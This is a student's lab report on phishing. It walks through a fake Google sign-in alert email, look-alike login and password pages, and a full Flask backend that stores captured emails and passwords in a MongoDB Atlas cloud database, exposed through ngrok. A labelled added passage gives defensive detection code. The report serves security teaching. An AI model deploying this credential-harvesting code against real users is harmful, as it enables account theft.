Cybersecurity Lab8


Software and Cybersecurity (CS/IT 445)

Lab Assignment 8
Phishing Attacks

Mamindla Sathvika
202151084

Objective: To understand, demonstrate, and document phishing techniques such as
attachment-based phishing and credential harvesting. This assignment demonstrates how
attackers attempt to compromise systems and gather sensitive information using phishing tactics.

Task 1: Demonstration of Attachment-Based Phishing attack

Objective

To simulate an attachment-based phishing attack using Google Apps Script, which will display a
message when a shared Google Document is accessed.

Steps:

1. Open Google Chrome Browser.
2. Navigate to Google Docs by going to https://docs.google.com/.
3. Open the Apps Script editor associated with the Google Doc:
○ Go to Extensions in the Google Docs menu.
○ Select Apps Script to open the scripting environment.

4. Enter the Code:

This code will display an alert with a message whenever someone opens the Google Document.

5. Save and Reload the Document:

○ Save the script and reload the Google Doc.

Explanation

This simulates an attachment-based phishing attack by using Google Apps Script to execute a
pop-up message. The attacker could use such tactics to coerce users into performing an action,
such as making a payment.

Task 2: Demonstration of Credential Harvesting Attack

Objective:

To simulate a credential harvesting phishing attack by creating a fake HTML email resembling a
legitimate service and gathering credentials through an API endpoint.

Prerequisites:
Python, Flask, PyMongo, dnspython, ngrok, MongoDB

● HTML files for the phishing email and fake login pages
● Flask for API creation and request handling
● MongoDB Atlas for cloud-based credential storage
● Ngrok for port tunneling

Step 1: Create a Replicated Google Email Page

File Name: index.html

● Function: This HTML page alerts the user to a suspicious sign-in and asks them to
review their account activity by clicking the “Review your Activity” button.
● Purpose: To create urgency for the user to interact with the button, leading to the
phishing login page.

Step 2: Set Up Login and Credential Harvesting Pages

This step involves two pages that guide the user through a simulated Google login process.

1. Email Login Page (login.html):
○ Purpose: Collects the user’s email ID, designed to look like a legitimate Google
login screen.
2. Password Page (password.html):
○ Purpose: Collects the user’s password and includes functionality for password
visibility toggling.

Step 3: Form and API Endpoint for Credential Harvesting

Setup:

● Created a Flask application to serve as the API endpoint and manage requests between
the HTML pages.
● Integrated MongoDB Atlas to store credentials securely on a cloud server.
● The Flask app captures email and password data from the fake login pages and routes it
to MongoDB Atlas.

Backend Code Functionality:

● Serves as a bridge between the frontend (HTML pages) and the database.
● Configures credential storage in MongoDB, appending new entries as they come in.

main.py (Flask Application):

from flask import Flask, render_template, request, redirect, url_for
from pymongo import MongoClient
from pymongo.server_api import ServerApi

app = Flask(__name__)

# MongoDB connection setup
uri = "mongodb+srv://sathvika1609:[email protected]/?retryWrites=true&w=majority&appName=Sathvika"
client = MongoClient(uri, server_api=ServerApi('1'))
db = client['user_data']  # Replace 'user_data' with your database name
users_collection = db['users']  # Replace 'users' with your collection name

# Confirm MongoDB connection
try:
    client.admin.command('ping')
    print("Pinged your deployment. You successfully connected to MongoDB!")
except Exception as e:
    print("Error connecting to MongoDB:", e)

@app.route('/')
def index():
    # Render index.html, simulating a sign-in notification email
    learner = {
        "first_name": "Sathvika",
        "email": "[email protected]"
    }
    return render_template('index.html', learner=learner)

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        email = request.form['email']
        # Redirect to the password page, passing the email as a parameter
        return redirect(url_for('password', email=email))
    return render_template('login.html')

@app.route('/password', methods=['GET', 'POST'])
def password():
    email = request.args.get('email', '')  # Get email from query string
    message = ""
    if request.method == 'POST':
        password = request.form['password']
        # Save email and password to MongoDB
        try:
            users_collection.insert_one({"email": email, "password": password})
            print(f"Stored Email: {email}, Password: {password} in MongoDB")
            message = "You have successfully entered your password."
        except Exception as e:
            print("Error saving to MongoDB:", e)
            message = "An error occurred while saving to the database."
    return render_template('password.html', email=email, message=message)

if __name__ == '__main__':
    app.run(debug=True)

Below is the output after running the main.py file:

Below is the output by running the command: ngrok http 5000

Step 4: API Setup with Ngrok Port Tunneling

● Ngrok was used to expose the local server to the internet, providing an accessible link for
the API endpoint. This URL was embedded within the email and button links.
● Testing: The setup was tested on both laptop and mobile device to ensure the link
functioned correctly.
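
Seen from the receiving side, the email built in Steps 1 and 4 has two detectable traits: it claims to be from Google, and its button links to a tunnelling host. The following is an added example, not part of the original lab, of a mail-filter check for both; the suffix list, the brand map, the function names and the sample email are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: illustrative, non-exhaustive list of tunnelling-service suffixes.
TUNNEL_SUFFIXES = ("ngrok.io", "ngrok-free.app", "ngrok.app")
# Assumption: brand name mapped to the domains its real mail links to.
BRAND_DOMAINS = {"google": ("google.com",)}

class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join("".join(self._text).split())))
            self._href = None

def host_matches(host, suffixes):
    # Match the domain itself or any subdomain, never a bare substring.
    return any(host == s or host.endswith("." + s) for s in suffixes)

def score_email(html, claimed_brand):
    """Return (href, text, reasons) for each link that looks suspicious."""
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        host = (urlsplit(href).hostname or "").lower()
        reasons = []
        if host_matches(host, TUNNEL_SUFFIXES):
            reasons.append("tunnel-host")
        if host and not host_matches(host, BRAND_DOMAINS.get(claimed_brand, ())):
            reasons.append("brand-mismatch")
        if reasons:
            findings.append((href, text, reasons))
    return findings

# Constructed sample: a Google-themed alert whose button points at a tunnel URL.
SAMPLE = """<html><body><p>Google: new sign-in on your account</p>
<a href="https://example-tunnel.ngrok-free.app/login">Review your Activity</a>
<a href="https://myaccount.google.com/notifications">Help</a></body></html>"""

if __name__ == "__main__":
    for finding in score_email(SAMPLE, "google"):
        print(finding)
```

The suffix comparison is anchored on a dot, so a host such as google.com.example.net is still reported as a brand mismatch.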

After clicking the link printed in the terminal by the ngrok command, the page below opened.
After clicking Visit Site on the laptop, the page below opened.
Clicking “Review Your Activity” opens the page below, from which we can get the
details of the user.

Step 5: Credential Storage in MongoDB

● MongoDB Atlas: Stores harvested data with each endpoint hit from the email and
password pages.
● Verification: Inspected the MongoDB database to verify that credentials were logged
with each interaction.
Backend Process:

Ngrok terminal

Ngrok Traffic Inspector


Flask Application terminal output:

Login Through Mobile Phone via same link:


Backend Process:

We can see that the second set of credentials is also stored in the database.

Ngrok Terminal output:


Ngrok Traffic Inspector:

Flask Application terminal output:

Successfully Demonstrated the Credential Harvesting Attack and stored the
passwords in MongoDB database!
